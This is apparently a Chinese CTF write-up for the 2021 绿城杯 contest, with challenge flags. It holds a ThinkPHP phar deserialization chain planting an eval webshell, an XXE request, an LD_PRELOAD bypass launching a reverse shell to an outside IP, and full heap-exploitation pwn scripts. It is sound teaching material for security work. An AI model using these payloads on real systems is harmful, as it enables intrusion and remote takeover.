点击蓝字 · 关注我们
ezcms
ciscn华东北分区赛awd的链⼦
namespace thinkcachedriver {class File{protected $options=null;protected $tag;function __construct(){$this->options=['expire' => 3600,'cache_subdir' => false,'prefix' => '','path' => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9SRVFVRVNUWydzdWFudmUnXSk7Pz4g/../uploads/user/4/allimg/20210929/a.php','data_compress' => false,];$this->tag = 'suanve';}}}namespace thinksessiondriver{class SessionHandler{}class Memcached extends SessionHandler{protected $handler;protected $config = [];function __construct(){$this->config['session_name'] = 123;$this->config['expire'] = 123;$this->handler = new thinkcachedriverFile();}}}namespace thinkconsole{class Output{protected $styles;private $handle;function __construct(){$this->styles = array('readAndWrite');$this->handle = new thinksessiondriverMemcached();}}}namespace think {class Process{private $processInformation;private $status;private $process;private $processPipes;function __construct(){$this->status = 'started';$this->processInformation= array("running"=>true);$this->processPipes = new consoleOutput();$this->process = 1;}}}namespace {use thinkProcess;// echo base64_encode(serialize(new Process()));@unlink("phar.phar");$phar = new Phar("phar.phar"); //后缀名必须为phar$phar->startBuffering();$phar->setStub('GIF89a' . '<?php __HALT_COMPILER();?>');$o = new Process();$phar->setMetadata($o); //将⾃定义的meta-data存⼊manifest$phar->addFromString("test.txt", "test"); //添加要压缩的⽂件//签名⾃动计算$phar->stopBuffering();copy("./phar.phar","/Users/su/1.gif");}
⽣成phar⽂件 eyoucms不校验ico后缀的⽂件 所以改名为ico⽂件即可上传,xxe触发phar 通过gitee发现了⼀个xxe的修复 应该可以利⽤。
POST /index.php/home/Index/_initialize HTTP/1.1Host: 0666787d-4b66-4e6e-8d13-55ab438b085f.zzctf.dasctf.comContent-Type: text/xml; charset=utf-8Cache-Control: max-age=0Content-Length: 265<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=phar:///var/www/html/uploads/user/4/allimg/20210929/4-210929141155239.ico" >]><root><name>&xxe;</name></root>
<?phpini_set('open_basedir',dirname(__FILE__));mkdir('tmp');chdir('tmp');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo "fuck runing";$cmd = '/readflag';$cmd = "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuMTk2LjE2NS4xMTUvOTAxIDA+JjE=|base64 -d |bash";$out_path = "/tmp/xxx";$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";putenv("EVIL_CMDLINE=" . $evil_cmdline);$so_path = "/tmp/exp.so";putenv("LD_PRELOAD=" . $so_path);mb_send_mail("", "", "");echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>";//var_dump(file_get_contents("/"));
ezphp
githack获取源码
FLAG DASCTF{ca9efc658d3d96d7f2ccc81733bb4830}
[warmup]⾳频隐写
easyre
32位exe⽂件,打开之后是魔改的rc4
直接写脚本不好做,可以⽤爆破来爆破每⼀位,python的os库可以调⽤exe
import osb=['Hello, this is my world.If you want flag, give me something I like.n', 'n', 'n', 'n',"sorry!I don't like your stuff."]flag=""c=""for i in range(50):for j in range(32,127):flag=cflag+=chr(j)with open("tt.txt", "w") as f:f.write(flag)os.system("easy_re.exe <tt.txt> flag.txt")with open("flag.txt", "r") as a:data = a.readlines()#print(data)if(data!=b):print(chr(j))c+=chr(j)break
FLAG flag{c5e0f5f6-f79e-5b9b-988f-28f046117802}
RSA1
[warmup]加密算法
加密算法是读到字⺟的下标,然后按照 (下标*a+b)%m 的计算⽅式,计算出新的下标,来表示新的字符串。只需要 写⼀个逆操作就好。
from Crypto.Util.number import *cipher_text = 'aoxL{XaaHKP_tHgwpc_hN_ToXnnht}'str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'def decode(plain_text, a, b, m):flag = ''for j in plain_text:for i in range(len(str1)):if (i*a+b) % m == str1.find(j):flag += str1[i]if j not in str1:flag += jprint(flag)decode(cipher_text,37,23,52)# flag{AffInE_CIpheR_iS_clAssiC}
null_pwn
#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./null_pwn'#context.arch='amd64'while True :# try :elf=ELF(elfelf)context.arch=elf.archgdb_text='''telescope $rebase(0x202040) 16'''if len(sys.argv)==1 :clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')io=process(elfelf)# io=process(['./'],env={'LD_PRELOAD':'./'})clibc.srand(clibc.time(0))libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]else :clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')io=remote('82.157.5.28',51704)clibc.srand(clibc.time(0))libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]def choice(a):io.sendlineafter('Your choice :',str(a))def add(a,c,b):choice(1)io.sendlineafter('Index:',str(a))io.sendlineafter('Size of Heap : ',str(c))io.sendafter('Content?:',b)def edit(a,b):choice(3)io.sendlineafter('Index:',str(a))io.sendafter('Content?:',b)def show(a):choice(4)io.sendlineafter('Index :',str(a))def delete(a):choice(2)io.sendlineafter('Index:',str(a))add(0,0x88,'a')add(1,0x68,'a')add(2,0x68,'a')add(3,0x88,'a')add(4,0xf0,'a')add(5,0xf0,'a')delete(0)show(0)edit(3,'x00'*0x80+p64(0x200)+'x00')delete(4)delete(1)add(0,0xc8,'a'*8)show(0)libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['__malloc_hook']-840-0x10libc.address=libc_basebin_sh_addr=libc.search('/bin/shx00').next()system_addr=libc.sym['system']free_hook_addr=libc.sym['__free_hook']edit(0,'x00'*0x88+p64(0x71)+p64(libc.sym['__malloc_hook']-0x23)+'n')add(1,0x68,'a')add(3,0x68,'a')edit(3,'x00'*0x13+p64(libc_base+one_gadgaet[2])+'n')edit(0,'x00'*0x88+p64(0x1000)+p64(libc.sym['__malloc_hook']-0x23)+'n')delete(1)success('libc_base:'+hex(libc_base))# success('heap_base:'+hex(heap_base))# gdb.attach(io,gdb_text)io.interactive()# except Exception as e:# io.close()# continue# else:# continue
uaf
#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./uaf_pwn'#context.arch='amd64'while True :# try :elf=ELF(elfelf)context.arch=elf.archgdb_text='''telescope $rebase(0x202040) 16'''if len(sys.argv)==1 :clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')io=process(elfelf)# io=process(['./'],env={'LD_PRELOAD':'./'})clibc.srand(clibc.time(0))libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]else :clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')io=remote('82.157.5.28',50202)clibc.srand(clibc.time(0))libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]def choice(a):io.sendlineafter('>',str(a))def add(c):choice(1)io.sendafter('size>',str(c))def edit(a,b):choice(3)io.sendlineafter('index>',str(a))io.sendafter('content>',b)def show(a):choice(4)io.sendlineafter('index>',str(a))def delete(a):choice(2)io.sendlineafter('index>',str(a))io.recvuntil('0x')heap_addr=int(io.recv(12),16)add(0x88)add(0x68)add(0x68)delete(0)show(0)libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['__malloc_hook']-88-0x10libc.address=libc_basebin_sh_addr=libc.search('/bin/shx00').next()system_addr=libc.sym['system']free_hook_addr=libc.sym['__free_hook']delete(1)edit(1,p64(libc.sym['__malloc_hook']-0x23))add(0x68)add(0x68)edit(4,'x00'*0x13+p64(one_gadgaet[2]+libc_base))delete(1)delete(1)success('libc_base:'+hex(libc_base))# success('heap_base:'+hex(heap_base))# gdb.attach(io,gdb_text)io.interactive()# except Exception as e:# io.close()# continue# else:# continue
GreentownNote
#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./GreentownNote'#context.arch='amd64'while True :# try :elf=ELF(elfelf)context.arch=elf.archgdb_text='''telescope $rebase(0x202040) 16'''if len(sys.argv)==1 :clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')io=process(elfelf)# io=process(['./'],env={'LD_PRELOAD':'./'})clibc.srand(clibc.time(0))libc=ELF('/glibc/x64/2.27/lib/libc-2.27.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]else :clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')io=remote('82.157.5.28',51701)clibc.srand(clibc.time(0))libc=ELF('./libc-2.27.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]def choice(a):io.sendlineafter('Your choice :',str(a))def add(b,c):choice(1)io.sendlineafter(':',str(b))io.sendafter(':',str(c))def show(a):choice(2)io.sendlineafter(':',str(a))def delete(a):choice(3)io.sendlineafter(':',str(a))add(0x88,'a')add(0x88,'a')for i in range(7):delete(1)delete(0)show(0)libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['__malloc_hook']-96-0x10libc.address=libc_basebin_sh_addr=libc.search('/bin/shx00').next()system_addr=libc.sym['system']free_hook_addr=libc.sym['__free_hook']add(0x88,p64(free_hook_addr))add(0x88,p64(free_hook_addr))new_shell_code_head_addr=free_hook_addr&0xfffffffffffff000shell1='''xor rdi,rdimov rsi,%dmov rdx,0x1000xor rax,raxsyscalljmp rsi'''%new_shell_code_head_addrpay=p64(libc.sym['setcontext']+53)+p64(free_hook_addr+0x10)+asm(shell1)add(0x88,pay)srop_mprotect=SigreturnFrame()srop_mprotect.rsp=free_hook_addr+0x8srop_mprotect.rdi=new_shell_code_head_addrsrop_mprotect.rsi=0x1000srop_mprotect.rdx=4|2|1srop_mprotect.rip=libc.sym['mprotect']add(0x200,str(srop_mprotect))# gdb.attach(io,gdb_text)delete(3)shell2='''mov rax,0x67616c662f2epush raxmov rdi,rspmov rsi,0x0xor rdx,rdxmov rax,0x2syscallmov rdi,raxmov rsi,rspmov rdx,0x100mov rax,0x0syscallmov rdi,0x1mov rsi,rspmov rdx,0x100mov rax,0x1syscall'''io.sendline(asm(shell2))# success('libc_base:'+hex(libc_base))# success('heap_base:'+hex(heap_base))# gdb.attach(io,gdb_text)io.interactive()# except Exception as e:# io.close()# continue# else:# continue
EDI安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号
原文始发于微信公众号(EDI安全):2021 绿城杯 wp
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论